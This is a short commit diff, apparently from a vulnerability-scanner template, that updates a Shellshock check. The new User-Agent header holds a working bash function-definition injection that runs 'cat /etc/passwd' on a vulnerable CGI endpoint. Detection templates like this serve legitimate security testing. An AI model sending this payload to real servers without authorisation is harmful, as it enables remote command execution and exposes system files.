Improve shellshock payload
parent
86c124a3ae
commit
f4ebffa1bc
|
@ -8,7 +8,7 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
headers:
|
headers:
|
||||||
User-Agent: "{ :;}; echo $(</etc/passwd)"
|
User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/cgi-bin/status"
|
- "{{BaseURL}}/cgi-bin/status"
|
||||||
matchers:
|
matchers:
|
||||||
|
|
Loading…
Reference in New Issue